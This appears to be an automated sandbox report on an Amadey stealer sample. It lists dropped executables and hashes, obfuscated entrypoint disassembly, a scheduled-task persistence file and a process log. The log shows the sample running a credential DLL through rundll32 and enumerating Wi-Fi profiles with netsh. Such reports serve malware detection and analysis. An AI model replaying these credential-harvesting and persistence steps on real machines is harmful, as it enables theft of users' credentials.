SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\sx0rXq9mQR9aeLWBWHbPdr14.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.8841260773675135
Encrypted:	false
SSDEEP:	98304:00NFR6666666666666666666666666666666x666666666666666fwwwwwwwwwwO:1PMki6zio75L3pf3dedO4keCIwkoYbgu
MD5:	94639CE6A705B6E759CB40111DC65842
SHA1:	28626E3B3ED6687728793E4141FA8D7C0F817D49
SHA-256:	EFD38FABA98B02B24D956BAEAFDE3FF8F89DCD62101A04F47316981BFAEAF15A
SHA-512:	89F9F601F8442CC02956706CEF078FC8B1FB810B099B1E6CBBA764A25BA435ED19ABF6E3E108151345B9D862B5840491BDB87002D75B6FB0511FF5CD4865D067
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R......&S...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\tLniRa1wNfVBc8wtGlFeZuV5.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\tqElYl8Fl4JU3kvWVy6e00VW.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\uOTCOcyWGW2C0V1L0OAjLfFo.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\Pictures\uWDQa01moDg0YUv8UXTjuXuR.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\Pictures\uhjRBnwj8K4T9LYmtd6M66hw.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\Pictures\uuRE7gXsEM4RR1NoZUBwtrlp.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\v05bbHszTdSghZlrnH5jWCvs.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\Pictures\wZuV3PgWQZH6WkVb85MHgKez.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	3302400
Entropy (8bit):	7.983528152249971
Encrypted:	false
SSDEEP:	49152:fEOGfMr0UrM21zm6mVonU7JCGjh9FDrjop1jy50JtrD2sGxgLJ+r8+NSR63xrO0s:rtr0CnnGJCGl9GDnrNGaLJ5RKxy
MD5:	5C0D04CCD0CBCD8CC90A502DF8B512E7
SHA1:	0F905A137B801A69CF498FC0F8C5F00E75C5E689
SHA-256:	BC84C3A9CFEB083FE41A238C55EA3163B5C9E5103FEE0A7D7F4D8A1236B6D22D
SHA-512:	2D8D2630D4C362C67BC54BAD9B49DD0B11A5B9623CF106099B141E3FCF66D8032A3B855169BD636FEBFE517F0C8581DF62F70E77AF3C9CC7691AC407F7391D23
Malicious:	true
Reputation:	unknown
Preview:	MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....r.......Qp........@..............................r.....x.3... ..................................................Pp......`p..E...en......F\.h....................................\p.(....................Pp.`............................MPRESS1.@p.......0......................MPRESS2.....Pp.......0..................rsrc....E...`p..F....0.............@..............................................................v2.19....0. ../;.,...p.#..JNy..P..{....I..W._...d......N. ^f.3...u...J......=.K\3.p...1....L.a...y.!.....}.\|.......1..K.l...Fl'......:..D.yfcOh.p..i.Ki>......d.Yc.C&J.0..P+.....`.M.....R..s.;.n.t.......%.....II4u. .......f_..+...\|.._.!.v.r...d..O..L.G...HZ...`....p.cy..n..........G..Bq.9#Q.......RU.?f.:.....a..'..>G.X{.........g....B(.....X.gu>M~...;...A2..<..........`.*~......pYs..p3g).Yr......n...a.K.i.Nd56.&J.'...r.n...T...Z..F.pK.\|.I$.u..W.Z..A.!....z.o\|.....f<

C:\Users\user\Pictures\yhDNs5CKgcvWpHQdXrg6et6I.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\Pictures\zkP3dJByFmLvW6zaaFPB4q1s.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\explorgu.job

Download File

Process:	C:\Users\user\Desktop\bUWKfj04aU.exe
File Type:	data
Category:	dropped
Size (bytes):	306
Entropy (8bit):	3.4414910032566595
Encrypted:	false
SSDEEP:	6:mz1ZlMDZXaXUEZ+lX1yrlbtE9+AQy0lKt0:mz6laQ1yrA9+nVKt0
MD5:	1E36AB84219D44FCBC0CDF598D796647
SHA1:	390EA21D3B95C4A69E97EF3DF7DE6125C0062644
SHA-256:	2849E3C5058CF9A54AD3DAC0BDF9C999BD498B7CA81EA3143455F8F9A477AF45
SHA-512:	ADC51DAB1E36AAE64FE6C48A56920609D7284203624C7A88C167C47DBAD96084907AA687E9744AB5D0A830406AD7313C664D31BADB94362B9408F8D3AFDDF8B0
Malicious:	false
Reputation:	unknown
Preview:	.......b.W.D....Q...F.......<... .....s.......... ....................=.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.0.c.0.7.2.6.0.d.c.\.e.x.p.l.o.r.g.u...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................*.@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.475536591418739
Encrypted:	false
SSDEEP:	6144:LzZfpi6ceLPx9skLmb0f+ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNmjDH5S:nZHt+ZWOKnMM6bFpMj4
MD5:	7479A974D3CC7040475621C7DE97C28C
SHA1:	1C16205B2B54FE785803F578BA0A3A198134C759
SHA-256:	AB0896D7A67E041BED830CB058445FA2B7E8271A161904178585DB9EC3DAAEC9
SHA-512:	1C156D87BE9FE7A6B0F50DC8446EB6D2CC132B4CBD02AB78055503CE64BE2D0F3E3AD00354DC2E9FF06B3C9F200129F12FF5D6C1A0E5921DD3EF43DBD4BBEA7D
Malicious:	false
Reputation:	unknown
Preview:	regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZP..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.959773875855962
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bUWKfj04aU.exe
File size:	1'858'560 bytes
MD5:	b9a582f60e89571526c4a6dacbb6a576
SHA1:	0fe5061a1a4aa43d2ba13e954813746cef08292a
SHA256:	a02549a343b100949c013f1c84927136e8c8f6e23110ae1d025c9733d5ad712f
SHA512:	fc3039d7f4128c6eed4e400514d6f4b94856fc4977c85ef960eda781ad2596524397e6f3c2d83949103578854d155b04b8bf8a5c9b693b351deea9ae7dcf738d
SSDEEP:	49152:eTVytZvQtZCv34v946oF0E0TPBtjQk0xyCf:YV25i9JxptjQk0xP
TLSH:	4A85330C7CE3D19DE51A5976E78BEE6EED8931486D911228249F03A1FA3C32BD65603C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A\|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@...............

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8a1000
Entrypoint Section:	luxgzuin
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x65BFB289 [Sun Feb 4 15:51:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
push eax
push esi
mov esi, 3F5F791Ch
mov dword ptr [esp+04h], esi
pop esi
mov dword ptr [esp], esi
push ecx
mov dword ptr [esp], 1396ED17h
mov dword ptr [esp], edx
mov dword ptr [esp], eax
push ebx
mov ebx, esp
add ebx, 00000004h
sub ebx, 04h
xchg dword ptr [esp], ebx
pop esp
mov dword ptr [esp], eax
mov dword ptr [esp], ebx
call 00007F0739419BF6h
int3
mov eax, dword ptr [esp]
push edx
mov edx, esp
add edx, 00000004h
add edx, 00000004h
xchg dword ptr [esp], edx
mov esp, dword ptr [esp]
push eax
push dword ptr [esp]
pop ebx
add esp, 04h
push ecx
push ebx
mov ebx, FFFFFFFFh
mov ecx, ebx
pop ebx
sub eax, ecx
pop ecx
push ebp
push esi
mov esi, 73670A6Ah
mov ebp, 73807A6Ah
add ebp, 3372EF99h
sub ebp, esi
sub ebp, 3372EF99h
pop esi
sub eax, ebp
pop ebp
sub eax, 0DF00039h
add eax, 0DF00000h
cmp byte ptr [ebx], FFFFFFCCh
jne 00007F0739419C9Fh
push eax
mov ah, ADh
push 405F94C5h
mov dword ptr [esp], edx
mov edx, 00000000h
add edx, ebx
mov byte ptr [edx], FFFFFFADh
pop edx
xor byte ptr [ebx], ah
pop eax
push edx
push 477F4CA3h
pop edx
xor edx, 78DF0C44h
add edx, C05FCF19h
push ecx
push ebx
mov ebx, edx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x67056	0x6a	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x66000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a09c8	0x10	icxmwjzd
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4a0978	0x18	icxmwjzd
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x65000	0x2d600	041e9c02838257ac86aa104ed7576bf0	False	0.9975034435261708	data	7.980453073658566	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x66000	0x1e0	0x200	dda4ceb32be948ff098aafa8d66e5012	False	0.580078125	data	4.50259691893953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x67000	0x1000	0x200	3e006a9335e338058eeedc928303ef15	False	0.1484375	data	1.0173294605253855	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x68000	0x2a2000	0x200	977b226d42934eb9e940f66cd617206b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
icxmwjzd	0x30a000	0x197000	0x196c00	46ce238db45398f39c9bb1eb5438d47d	False	0.9942756751306084	data	7.953998794627234	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
luxgzuin	0x4a1000	0x1000	0x400	0ace17f09cdaf88a93eb610122890626	False	0.76171875	data	6.075124621208905	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4a09d8	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	07:41:42
Start date:	15/04/2024
Path:	C:\Users\user\Desktop\bUWKfj04aU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bUWKfj04aU.exe"
Imagebase:	0x8c0000
File size:	1'858'560 bytes
MD5 hash:	B9A582F60E89571526C4A6DACBB6A576
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2112311636.0000000005090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:41:46
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Imagebase:	0x440000
File size:	1'858'560 bytes
MD5 hash:	B9A582F60E89571526C4A6DACBB6A576
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2150646728.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	07:41:53
Start date:	15/04/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Imagebase:	0x760000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:41:53
Start date:	15/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Imagebase:	0x7ff7e9eb0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	07:41:53
Start date:	15/04/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
